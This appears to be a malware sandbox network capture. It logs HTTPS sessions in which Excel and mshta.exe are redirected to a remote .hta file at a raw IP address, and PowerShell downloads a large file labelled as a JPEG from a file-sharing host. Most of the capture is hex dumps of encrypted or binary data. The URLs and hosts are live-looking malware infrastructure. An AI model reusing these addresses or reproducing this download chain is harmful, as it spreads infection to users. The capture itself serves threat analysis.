                                                                                                            2024-11-20 15:57:48 UTC8192INData Raw: 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83 ec b3 eb 60 6d 46 b6 66 59 18 fa 6b 9e 30 3f 67 bc 14 cd 33 4f a8 57 0c 87 81 ef f5 cf 61 0b 34 76 ad f8 41 ae 7b 60 29 e1 9e 14 9e 1b 03 44 8a 18 5e e0 cd d7 09 2a bb a5 d9 b5 27 d2 38 c7 84 88 c6 b7 ad fb 5e 55 d5 5d 48 2c 0f 5e 9c 60 26 fb 21 8a e4 53 67 8e 05 f5 18 ab 6b dd 26 69 4e a0 96 54 09 1a aa ed 53 c5 10 c0 e2 da e5 95 d9 96 33 b8 df 42 dc 0c ce 7d 3c c8 68 ee e3 93 5c 8c 0d 57 f0 ed 06 b3 42 16 48 4f de 1d bd 2a 83 75 12 78 1f 0e 2f 32 75 3f 66 5d 21 96 3d 2b ca ce 42 ee 5e 36 92 3a 83 df 8c 14 52 48 cd b0 3b 2b 86 e7 92 3f eb 8f e9 75 7a ed 38 2f 16 a1 57 aa 32 df 26 cf 4a 3c fd 70 32 bc 0e 0d 6e 8b c4 c3 b0 29 1c 7f f7 a3 77 55 cf af e9 7c 5a 49 f4 4a 16 25 68 f6 8d b2 15 14 bc
                                                                                                            Data Ascii: a~C!C3@8`mFfYk0?g3OWa4vA{`)D^*'8^U]H,^`&!Sgk&iNTS3B}<h\WBHO*ux/2u?f]!=+B^6:RH;+?uz8/W2&J<p2n)wU|ZIJ%h
                                                                                                            2024-11-20 15:57:48 UTC8192INData Raw: 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9 b5 a5 d6 c3 06 88 41 24 c2 47 73 6c 0f aa 99 b2 de 37 36 f8 da 3f 21 88 46 07 7b 70 07 1d b1 0d 36 9d e2 58 b5 60 09 42 9f 52 8e 28 9e 07 ea 46 07 a9 56 b6 26 89 2b ec 78 e9 ed 92 5d 89 a2 68 66 46 97 c4 65 9b c4 8c 52 a8 89 69 86 c1 ef c7 5b 19 a3 a9 79 34 f0 86 8e 31 2b dd 6d 26 80 c0 30 00 59 20 57 b9 ca a9 de b6 18 b0 3d 3d b3 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5 5a a7 d3 24 a2 19 54 bc ad b8 10 7d 26 f3 36 46 68 51 95 26 32 2b 9a 65 45 71 c0 e9 76 a0 7f 3c f5 fa d8 47 fb 2b 5a 47 4f
                                                                                                            Data Ascii: H?I?U/;I>A$Gsl76?!F{p6X`BR(FV&+x]hfFeRi[y41+m&0Y W==Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO
                                                                                                            2024-11-20 15:57:48 UTC8192INData Raw: ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e 94 ba a1 27 f8 49 6c 1c ba 57 8f 4c b2 06 50 4f 6a e7 3d 07 88 ec f1 7d 17 df e2 4f 2a 64 94 2e a1 11 4e d2 08 f4 b5 d7 16 45 57 be 63 ea 9b 73 04 e4 8a ae 2b fa e0 66 3a ee 86 c1 b3 d0 8c 17 dd 9b 63 28 16 18 5d 7b 67 a9 7d 3f d9 b5 50 ac be 2a 03 73 e9 f2 c5 f0 3a 58 ca eb 7c 13 4e da 13 af f0 2d 44 ba 88 a2 03 ef 10 cd ff 00 7b 15 8f c5 b6 85 8f 88 f6 3e c7 03 c9 26 9b ca 05 49 e0 0b bf 7c e9 62 67 88 5a 31 65 1c 10 3b 7b 66 ab 03 e4 aa 3a 2f 99 7d 72 8f a5 6d cc 19 d3 72 ae e2 09 23 8e bf 5c 0c 54 0c d1 0d d6 1b bd f7 c9 88 38 9c 39 27 6a 8e 95 9a 6f a0 91 e6 55 52 80 32 ee 00 df 35 ce 28 90 32 44 fa 80 c9 4a 69 97 75 92 a7 8f a6 04 8d 42 ba b8 60 19 4b 28 04 76 eb 83 25 ba a1 dc 2f 82 07
                                                                                                            Data Ascii: /ER;UM'IlWLPOj=}O*d.NEWcs+f:c(]{g}?P*s:X|N-D{>&I|bgZ1e;{f:/}rmr#\T89'joUR25(2DJiuB`K(v%/
                                                                                                            2024-11-20 15:57:48 UTC8192INData Raw: 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07 f0 f6 3f 21 57 66 f8 17 81 82 fa 79 74 f2 98 a5 55 dc bd 76 90 6b f2 ca 58 36 05 9f 7a c6 fe d5 7f d8 b5 71 49 a6 78 ff 00 7a a4 3a b2 d5 95 24 5f f6 f7 eb 98 71 78 ac 61 4d a3 2b 8f c4 07 f4 c0 da 5f 0c d6 16 8c 08 f6 87 1b 95 98 8a ae dd 31 f3 f6 69 59 43 99 cf 99 7d 42 8d a3 df 83 d7 07 e1 da 77 d4 e9 5f 53 2e 9d 67 59 11 4a 9d f7 b4 57 37 ec 40 24 fd 31 99 3c 5f 4f e0 9a 78 e0 d6 c8 5b 50 88 14 a2 7a 88 eb cb 0f e1 1d 39 c0 4a 7f 08 5d 1b 34 93 ce 86 28 dc 29 00 10 5b 8b ae 7d fe 18 b6 9b c3 9f 5e 9a 9d 4a 6d 8b 4e 84 aa 96 70 3e 9c 8e 78 cb 45 a5 d7 f8 ba ae a4 c2 eb 1a 90 11 59 7c bd ca 6c fa 41 e4 8f 8e 69 3f 86 cc 9e 01 26 95 c8 89 49 67 17 27 e1 02 8e da ae 7a 60 79 ef 1d d0 68 b4 40
                                                                                                            Data Ascii: aU/piu4d?!WfytUvkX6zqIxz:$_qxaM+_1iYC}Bw_S.gYJW7@$1<_Ox[Pz9J]4()[}^JmNp>xEY|lAi?&Ig'z`yh@
                                                                                                            2024-11-20 15:57:48 UTC8192INData Raw: 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe 1f 63 80 74 64 91 37 2a 31 53 d8 e2 ba c6 52 9b 08 b6 3d 3d 58 cc 69 be 06 f2 de 81 04 0f cf 11 8b 46 fe 6d 93 5b 79 2d ef 81 a5 f6 71 1a 1f 1f d1 2c 8b e9 3b bf f2 b6 7b 0d 7a c2 61 91 19 f6 a1 16 c5 78 bc f2 fe 19 a9 8e 0f 12 86 66 f5 05 0c 47 d5 48 fe b8 ef 89 78 82 6a 0e c8 d7 68 61 ef d7 03 2e 17 d6 24 ad 1e 92 56 10 5d ed eb 79 bb a4 90 e9 e0 65 d4 10 c4 7a ac 62 30 4f a7 d2 45 60 1d c4 75 cb 9d 6c 5a 85 01 68 0e 87 8e 4e 06 79 95 df ed 67 9d 1a f4 e0 9f f8 30 7e 2d 3b 3e aa 75 2d 41 a0 5b 00 5d d3 dd 65 d6 45 4f b5 22 98 14 ab 3f f2 11 fd 71 7f 16 dc 75 92 b0 1b 6e 1b 00 71 63 76 06 87 8c 05 fb 94 70 84 11 c4 b2 52 92 a7 9f 4b 61 b4 33 28 f0 b8 5a 45 5a 54 5a bf 82 8c 17 8b cb 14 9a 2d
                                                                                                            Data Ascii: CaY8&ctd7*1SR==XiFm[y-q,;{zaxfGHxjha.$V]yezb0OE`ulZhNyg0~-;>u-A[]eEO"?qunqcvpRKa3(ZEZTZ-
                                                                                                            2024-11-20 15:57:48 UTC8192INData Raw: 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be d8 07 99 03 c5 2c 2c 68 32 b2 80 bd 79 07 90 6b ae 79 33 1c 53 b2 c8 4c 8a 1b cc de 18 ee 62 55 77 11 74 3a dd 7d 33 77 53 17 8c 3c 12 39 9b 4c bb 48 65 11 b1 05 76 8e 40 f4 f5 26 b3 cb 34 f3 12 0b 3b 5a b9 63 b8 72 59 b8 63 fa 60 13 50 90 23 40 c8 1f 64 8b b8 ef a1 43 73 0a e9 f0 c7 a0 4d 34 9a a8 24 57 68 43 cc c5 d8 90 ca 08 a2 a0 71 fe 6a cc b9 67 69 84 4b 56 51 4a dd f5 f5 16 fc b9 c3 27 88 49 1e 96 18 10 22 94 76 70 db 41 3c 80 39 e3 e1 81 ec 25 89 51 88 25 9a c5 9e 7e 3f 0e d8 34 28 cf b1 08 06 ae 8e 60 cf a4 f1 2d 44 c7 51 26 a2 17 62 80 1e eb 5e d5 55 91 1e 87 5e ae 5a 3d 6c 6a d5 43 6c 8c bc 7c 28 60 7a 38 f4 a1 98 ab 50 e0 ff 00 2c 34 2a 11 42 ec b2 78 bc f3 32 41 e2 ea ca 0e b9 89
                                                                                                            Data Ascii: IjDQH,,h2yky3SLbUwt:}3wS<9LHev@&4;ZcrYc`P#@dCsM4$WhCqjgiKVQJ'I"vpA<9%Q%~?4(`-DQ&b^U^Z=ljCl|(`z8P,4*Bx2A
                                                                                                            2024-11-20 15:57:48 UTC8192INData Raw: 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e d1 63 93 b6 cf 4f 7c 1a 78 8c 8e 93 07 11 b4 b6 82 30 a4 21 90 30 a0 28 f7 e9 80 6f 1b d4 79 30 ed 54 57 f3 55 94 d8 ed 5d 6e fd f3 e7 9e 35 2b a0 11 59 a2 4f 4e fd 33 e8 5e 27 a6 33 69 c1 44 11 88 a3 67 63 cd 80 aa 68 7b 77 39 f3 8f 15 7f 32 73 62 88 ed f9 60 0f 4b aa 68 b4 b2 69 e4 41 24 4e 37 15 2c 46 d3 c1 bb 1f 2c e8 f5 12 69 22 91 12 32 93 b7 57 37 61 6a f8 07 a6 2a 80 b1 f5 38 8f 8e 2e e8 fe 58 de aa 36 32 09 02 12 bb 23 1b d8 1a bd 8b c7 23 01 ad 0e bd 34 7a 59 10 ab 19 0b 31 0e 2a 88 2b 54 7b f5 e7 15 82 59 20 25 e3 62 ac c2 8d 7b 5d e5 5f 4d 22 2a 99 11 95 5b d4 a4 ad 6e cb 32 88 c2 72 ad b8 5d 2f ce bf a6 01 d2 67 5d 5c 33 4c ec fb 1d 5b fe 10 7a 64 eb e6 4d 56 aa 49 93 76 d6 0a 40
                                                                                                            Data Ascii: TU7$xUI:v9.cO|x0!0(oy0TWU]n5+YON3^'3iDgch{w92sb`KhiA$N7,F,i"2W7aj*8.X62##4zY1*+T{Y %b{]_M"*[n2r]/g]\3L[zdMVIv@
                                                                                                            2024-11-20 15:57:48 UTC8192INData Raw: 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e 98 63 a6 90 96 21 49 0b f8 98 0e 07 d7 2a 60 63 c9 fa 60 5f c3 34 4c 35 8a e4 f0 2f 68 f7 e0 e6 d1 de aa ca 52 ef a1 f6 c5 bc 31 37 6b 34 b6 3f c4 2f fe 1c df 68 d2 e8 d1 c0 c5 8b 4e d4 c5 c5 83 db 10 13 3b 4e ea 84 2a a9 f6 eb 9e 8d c0 5b 00 0e 73 3d b4 a9 6c c1 28 9e b8 1e 76 75 0d e2 e5 b6 02 09 5a 07 e4 32 ba dd 2e c9 03 06 e5 95 8f ab b5 01 8e 6a 60 d9 e2 d4 05 fe 1f e4 32 de 21 18 06 2d e2 ed 5a 8f c6 b8 c0 46 70 cd e1 f1 a2 90 17 68 35 c7 aa ab af e7 8c 78 06 9d 5d e5 76 65 34 bb 76 b7 43 95 78 83 78 7b 12 a3 d2 c0 29 06 b9 a5 07 fa e1 7c 28 c3 19 65 76 2b 29 61 b6 81 37 7c 7f 5c 04 bc 41 25 87 5d 16 f4 8c 32 a8 2a b1 72 28 31 f7 cd 3d 64 03 69 76 92 71 bb d3 b4 30 0a 38 ef c6 27 e2 ab
                                                                                                            Data Ascii: (4EUPc!I*`c`_4L5/hR17k4?/hN;N*[s=l(vuZ2.j`2!-ZFph5x]ve4vCxx{)|(ev+)a7|\A%]2*r(1=divq08'
                                                                                                            2024-11-20 15:57:48 UTC8192INData Raw: a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85 59 58 23 21 00 06 1c 8e 3d ac 8f cf 15 77 2e cc cc 6c 93 66 85 5e 05 c6 dd a4 ee 50 2d 7d fd 8e 18 6a 21 54 e0 7f 19 3b 41 20 d5 11 d7 eb 89 76 eb 91 58 0d 3c 81 82 aa 05 04 6e e9 7d 08 f8 e1 a0 96 34 68 dc 95 b0 56 e8 10 78 20 f2 3a 11 43 b7 38 87 d7 0b 02 87 99 11 88 00 b0 04 93 54 30 1d d4 4f 13 ce cc 0a 12 5c 37 01 8d ed be 0d fb fc 30 0d 2a f9 d1 48 68 81 b4 ba 8b ea 38 3f 98 17 f5 c0 48 8c 8c ca c2 98 1a 3c df c7 05 58 1a 49 3c 40 20 b5 4a 0e 4e c0 c7 aa d0 06 fb df d3 20 48 8f 13 2f 99 c2 c5 44 80 7a 97 07 8b e7 11 50 b7 c9 20 51 e9 90 7a 57 eb 80 db ca ad 1b ad d9 2c 9d 01 e4 05 20 9f ce b0 53 32 bd b2 b5 92 ec 7e 9c 56 2f 59 74 0c cc 15 41 26 fa 60 3b 29 54 12 13 20 2c d0 a2 80 a0 fb
                                                                                                            Data Ascii: ]_vO:$YX#!=w.lf^P-}j!T;A vX<n}4hVx :C8T0O\70*Hh8?H<XI<@ JN H/DzP QzW, S2~V/YtA&`;)T ,


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.2249169198.244.140.414433552C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 15:57:49 UTC388OUTGET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: provit.uk
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 15:57:50 UTC443INHTTP/1.1 302 Found
                                                                                                            Content-Length: 96
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Date: Wed, 20 Nov 2024 15:57:50 GMT
                                                                                                            Location: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta
                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                            Vary: Accept
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-Dns-Prefetch-Control: off
                                                                                                            X-Download-Options: noopen
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Xss-Protection: 0
                                                                                                            Connection: close
                                                                                                            2024-11-20 15:57:50 UTC96INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 39 2f 34 35 2f 77 77 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 77 68 69 63 68 67 69 76 69 6e 67 62 65 73 74 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 2e 68 74 61
                                                                                                            Data Ascii: Found. Redirecting to http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.2249171198.244.140.414433652C:\Windows\System32\mshta.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 15:57:54 UTC412OUTGET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: provit.uk
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 15:57:54 UTC443INHTTP/1.1 302 Found
                                                                                                            Content-Length: 96
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Date: Wed, 20 Nov 2024 15:57:54 GMT
                                                                                                            Location: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta
                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                            Vary: Accept
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-Dns-Prefetch-Control: off
                                                                                                            X-Download-Options: noopen
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Xss-Protection: 0
                                                                                                            Connection: close
                                                                                                            2024-11-20 15:57:54 UTC96INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 39 2f 34 35 2f 77 77 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 77 68 69 63 68 67 69 76 69 6e 67 62 65 73 74 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 2e 68 74 61
                                                                                                            Data Ascii: Found. Redirecting to http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.2249174142.215.209.784432144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-20 15:58:10 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                            Host: 1017.filemail.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-20 15:58:10 UTC324INHTTP/1.1 200 OK
                                                                                                            Content-Length: 2230233
                                                                                                            Content-Type: image/jpeg
                                                                                                            Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                            X-Transfer-ID: wxhdiueivoluihj
                                                                                                            Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                            Date: Wed, 20 Nov 2024 15:58:10 GMT
                                                                                                            Connection: close
                                                                                                            2024-11-20 15:58:10 UTC1721INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                            2024-11-20 15:58:10 UTC8192INData Raw: 68 85 06 2d 03 15 16 09 8b f0 8f f9 b3 2b 53 a6 78 64 0d e8 65 2c 18 80 9c 1e 7a d5 e0 6c bc 4b 06 8c 2e 98 b4 61 5c 51 56 e0 82 7b e2 fa bd 6a 47 e6 47 3b b2 95 55 55 55 6e 58 d1 e4 e5 9b ef 22 12 aa f1 9e 81 57 61 e8 7e b8 a9 f0 99 f5 32 07 d4 4c a5 81 aa 29 c0 fd 70 2b a4 7d 3c 7a 60 c9 33 42 cd 19 7b 2d 7e ab c3 ea 75 da 81 0c 28 1f cb 05 77 39 ff 00 11 f6 fa e0 b4 fe 0a b1 36 e7 74 6b 26 b7 25 ed e7 fd ec 72 74 7b 2e 24 86 c8 17 fb a2 2c 0f f8 b0 12 28 92 4e 80 b2 98 65 1b f7 6d a3 bb fc 3f 9e 3b a8 6d ed 1c 01 da 25 6f c4 ca 68 8a ed 94 31 ca 88 14 3c 60 76 2b 15 1f cf 76 0d 8c e4 80 1e 36 27 d2 db 92 ff 00 4d d8 02 d6 cd 2c 51 c5 0c 73 9b 01 98 b8 f5 58 1d 32 35 1a dd f3 23 2c 92 ae e8 83 00 a6 86 e2 7b e3 88 b2 0b a7 81 5a b6 9a 82 8d 7f cd 8a 6a
                                                                                                            Data Ascii: h-+Sxde,zlK.a\QV{jGG;UUUnX"Wa~2L)p+}<z`3B{-~u(w96tk&%rt{.$,(Nem?;m%oh1<`v+v6'M,QsX25#,{Zj
                                                                                                            2024-11-20 15:58:10 UTC8192INData Raw: 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23 78 60 7d b9 6c e9 f5 9a 68 94 d2 18 d9 95 48 45 53 46 d5 6e c9 3c 75 39 95 24 b2 ac f1 b9 3c 58 2a 36 8a 03 b5 0e 99 67 26 47 0f c7 3f 88 9e 6f fd 56 07 0d 68 86 6d f0 a9 02 f9 5b e3 27 53 aa d3 6a d8 b1 8d a3 7e b6 28 e5 7c b2 ac c4 6d af e7 8b 94 56 26 8a 83 f3 c0 34 7a c9 21 1b 1c 09 23 6e a1 b9 39 41 24 7e 73 3a 06 41 5e 90 a7 9b c8 58 19 89 b6 07 6f 61 d4
                                                                                                            Data Ascii: )w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x`}lhHESFn<u9$<X*6g&G?oVhm['Sj~(|mV&4z!#n9A$~s:A^Xoa
                                                                                                            2024-11-20 15:58:10 UTC8192INData Raw: f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 eb 21 60 ea 41 ef b7 a7 eb 93 02 ed 56 70 f2 1f cb fb 64 b9 67 04 17 60 0f ca f0 10 9d dc 00 a6 82 df 04 1e bf 4c 59 1e 35 d4 ac 80 30 2a c1 a8 f7 ae 72 e4 93 a8 60 7d 5b 55 ab 70 04 58 53 f0 ca 95 0f a8 8e 80 0a e1 4f 07 bf 7e 3e 77 81 b3 06 b1 1f 4c 1d f7 33 01 66 91 88 ef de b1 27 09 47 52 24
                                                                                                            Data Ascii: 9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(!`AVpdg`LY50*r`}[UpXSO~>wL3f'GR$
                                                                                                            2024-11-20 15:58:10 UTC8192INData Raw: 83 b6 9a 81 1e e0 d7 e7 99 ea ea 9a 70 85 cb 5b 6f 65 b3 ea ae 83 a7 c8 fd 72 b1 12 b0 48 aa c4 d9 50 77 70 40 a3 d3 18 08 91 a8 2c 55 c2 ad 2a 91 c9 f8 9f d3 00 69 af 79 b5 12 04 4d bb c0 55 61 ce c1 ed c6 3e 64 86 76 d3 e9 9a 42 cf 23 d3 3e c2 2a e8 0f d3 31 a2 95 60 d6 2c a6 30 cb 76 53 a5 8c f4 30 3f 86 4d 34 1a 9d 3c 33 26 a1 3f 7a d1 96 56 5f c5 d0 92 45 71 81 57 96 28 75 3a 8e 15 85 04 55 6b 20 57 5e 07 cb 07 ae 08 d2 69 29 6e 32 8a df 86 ac 96 37 db 3b c4 64 6d 3e af f7 8b e5 cc 1c b3 a1 a3 b4 1e 42 9a ea 7a e5 67 77 9f 42 a9 13 b6 d0 c0 79 64 02 c0 f6 23 bd 12 7b 60 03 53 23 cb 34 c8 eb b4 9f 48 51 c5 7b 66 3c ae 68 c6 0f a5 4f 19 ba 66 10 e9 4b cc aa 65 54 3b 18 af 27 b7 ab 9e bd 6b 8c f3 cd 6c 49 ae a6 f8 c0 ad 9c 9d c6 aa b9 cb 2a 73 ce 59 d0
                                                                                                            Data Ascii: p[oerHPwp@,U*iyMUa>dvB#>*1`,0vS0?M4<3&?zV_EqW(u:Uk W^i)n27;dm>BzgwByd#{`S#4HQ{f<hOfKeT;'klI*sY
                                                                                                            2024-11-20 15:58:11 UTC8192INData Raw: 8f 51 39 b1 16 89 e6 76 48 91 a7 2a 7a a2 b5 57 63 d0 66 a4 5f 67 35 44 29 67 89 5c f5 52 c6 c7 e4 2b 03 23 47 ac f1 0f 0e d2 be 96 29 0a a3 13 4d 6c 0a f5 e1 79 aa e7 db 22 24 4d 36 ac ea 5a 38 b5 0e c7 75 48 59 80 6b 1e a3 ee 73 75 fe cc eb 9c 58 96 2f 80 dc df fa 72 a3 ec b6 b8 8e 65 d3 7f cc d7 ff 00 97 03 87 da 5d 64 df 8a 3d 3a d7 03 68 6a fc b7 60 e6 f1 a9 a6 84 a4 90 c2 c0 8a 36 8c 7f 99 c3 7f f0 d6 bd 1b 73 4b 01 1f 06 6e bf f2 e4 7f b0 35 45 58 97 84 03 fe 66 ff 00 d3 81 89 3c 61 e0 60 83 96 5f 6a 1f 4c c8 d1 ea 26 d0 48 11 11 4b 16 e5 8e e2 4f c0 e7 aa 93 c1 35 30 ac 9b 9d 18 22 17 e0 37 e1 af 72 33 ce cf a6 29 2c b2 73 4c 6c 5f b7 1d 30 3a 7d 73 4c f2 39 82 2d ee 17 73 05 3d 40 36 47 27 18 97 5c d0 78 76 9e 05 8a 16 46 88 92 1b 71 fe 26 1e ff
                                                                                                            Data Ascii: Q9vH*zWcf_g5D)g\R+#G)Mly"$M6Z8uHYksuX/re]d=:hj`6sKn5EXf<a`_jL&HKO50"7r3),sLl_0:}sL9-s=@6G'\xvFq&
                                                                                                            2024-11-20 15:58:11 UTC8192INData Raw: f5 93 1e b9 de 16 69 1a c0 e7 93 d3 3c ec f3 4e ac 55 c3 06 00 75 ed df 1d 79 74 c5 23 02 60 03 00 cc 07 bf b5 60 55 66 9b 59 ab dc 37 04 be d9 a2 27 d4 a2 b1 8f 4b c0 1c 16 61 67 f5 c6 60 d2 c4 9a 65 64 06 aa ec 29 c9 8d d4 39 34 c7 8e 84 60 62 ea 5d ce be 3d 40 8b 66 e5 01 b9 03 9c 6f 51 e5 a2 16 26 fe bc de 46 b1 e1 45 94 ec 66 2d ef db 33 63 49 b5 53 46 a6 c8 69 00 17 f2 bf e9 81 01 98 b3 3e c6 f2 c1 a2 6c 63 ba 6d 12 cd a6 32 0d c1 8b 50 27 e1 89 ea 9b c9 d5 50 b6 81 5f 80 05 02 47 51 9e 93 c3 1a 39 a0 f4 02 a0 fa c2 f7 1e f8 1e 6b 5b a3 d4 c1 29 96 44 6a 15 4d d2 f3 47 47 e1 33 38 8e 59 67 55 91 69 aa ac 81 ec 73 73 59 02 cf 08 50 54 9d d5 52 a6 e1 99 da b9 df 4a 91 aa ab 79 ac 00 21 79 51 ef 80 b3 c7 0e b1 27 48 ce e2 ad 5d 2b 9c c3 78 36 c2 24 be
                                                                                                            Data Ascii: i<NUuyt#``UfY7'Kag`ed)94`b]=@foQ&FEf-3cISFi>lcm2P'P_GQ9k[)DjMGG38YgUissYPTRJy!yQ'H]+x6$
